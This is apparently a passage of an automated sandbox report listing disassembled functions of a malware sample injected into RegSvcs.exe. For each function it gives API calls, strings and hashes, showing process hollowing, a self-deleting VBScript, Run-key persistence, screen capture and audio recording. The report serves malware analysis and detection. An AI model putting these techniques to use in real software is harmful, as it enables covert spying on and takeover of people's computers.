                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$InfoLocale_abort
                              • String ID:
                              • API String ID: 1663032902-0
                              • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                              • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                              • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                              • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • EnumSystemLocalesW.KERNEL32(004520C3,00000001), ref: 0045200D
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID:
                              • API String ID: 1084509184-0
                              • Opcode ID: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                              • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                              • Opcode Fuzzy Hash: 92dc4731b164c5dad593997b290ced1c322b4c5a654dbafbc59ecf52729822b9
                              • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$InfoLocale_abort_free
                              • String ID:
                              • API String ID: 2692324296-0
                              • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                              • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                              • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                              • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • EnumSystemLocalesW.KERNEL32(00452313,00000001), ref: 00452082
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID:
                              • API String ID: 1084509184-0
                              • Opcode ID: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                              • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                              • Opcode Fuzzy Hash: 80e5df12ac25632c7280d140c15a53509e07ecbf1c9f73c72f1a6f69193256f5
                              • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                              APIs
                                • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                              • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalEnterEnumLocalesSectionSystem
                              • String ID:
                              • API String ID: 1272433827-0
                              • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                              • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                              • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                              • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                              APIs
                                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                              • EnumSystemLocalesW.KERNEL32(00451EA7,00000001), ref: 00451F87
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID:
                              • API String ID: 1084509184-0
                              • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                              • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                              • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                              • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                              • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                              • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                              • Instruction Fuzzy Hash:
                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                              • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                              • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                              • DeleteDC.GDI32(00000000), ref: 00418F2A
                              • DeleteDC.GDI32(00000000), ref: 00418F2D
                              • DeleteObject.GDI32(00000000), ref: 00418F30
                              • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                              • DeleteDC.GDI32(00000000), ref: 00418F62
                              • DeleteDC.GDI32(00000000), ref: 00418F65
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                              • GetIconInfo.USER32(?,?), ref: 00418FBD
                              • DeleteObject.GDI32(?), ref: 00418FEC
                              • DeleteObject.GDI32(?), ref: 00418FF9
                              • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                              • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                              • DeleteDC.GDI32(?), ref: 0041917C
                              • DeleteDC.GDI32(00000000), ref: 0041917F
                              • DeleteObject.GDI32(00000000), ref: 00419182
                              • GlobalFree.KERNEL32(?), ref: 0041918D
                              • DeleteObject.GDI32(00000000), ref: 00419241
                              • GlobalFree.KERNEL32(?), ref: 00419248
                              • DeleteDC.GDI32(?), ref: 00419258
                              • DeleteDC.GDI32(00000000), ref: 00419263
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                              • String ID: DISPLAY
                              • API String ID: 479521175-865373369
                              • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                              • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                              • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                              • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                              • GetProcAddress.KERNEL32(00000000), ref: 00418139
                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                              • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                              • GetProcAddress.KERNEL32(00000000), ref: 00418161
                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                              • GetProcAddress.KERNEL32(00000000), ref: 00418175
                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                              • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                              • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                              • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                              • ResumeThread.KERNEL32(?), ref: 00418435
                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                              • GetCurrentProcess.KERNEL32(?), ref: 00418457
                              • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                              • GetLastError.KERNEL32 ref: 0041847A
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                              • API String ID: 4188446516-3035715614
                              • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                              • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                              • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                              • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                              APIs
                                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                              • ExitProcess.KERNEL32 ref: 0040D7D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 1861856835-332907002
                              • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                              • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                              • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                              • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                              APIs
                                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                              • ExitProcess.KERNEL32 ref: 0040D419
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                              • API String ID: 3797177996-2557013105
                              • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                              • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                              • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                              • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                              APIs
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                              • ExitProcess.KERNEL32(00000000), ref: 004124A0
                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                              • CloseHandle.KERNEL32(00000000), ref: 0041253B
                              • GetCurrentProcessId.KERNEL32 ref: 00412541
                              • PathFileExistsW.SHLWAPI(?), ref: 00412572
                              • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                              • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                • Part of subcall function 0041C3F1: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                              • Sleep.KERNEL32(000001F4), ref: 00412682
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                              • CloseHandle.KERNEL32(00000000), ref: 004126A9
                              • GetCurrentProcessId.KERNEL32 ref: 004126AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                              • String ID: .exe$8SG$WDH$exepath$open$temp_
                              • API String ID: 2649220323-436679193
                              • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                              • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                              • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                              • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                              • SetEvent.KERNEL32 ref: 0041B219
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                              • CloseHandle.KERNEL32 ref: 0041B23A
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                              • API String ID: 738084811-2094122233
                              • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                              • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                              • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                              • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                              APIs
                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Write$Create
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 1602526932-4212202414
                              • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                              • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                              • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                              • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                              • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                              • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                              • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                              • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                              • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                              • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.3013363499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                              • API String ID: 1646373207-234082672
                              • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                              • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                              • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                              • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                              APIs
                              • _wcslen.LIBCMT ref: 0040CE07
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
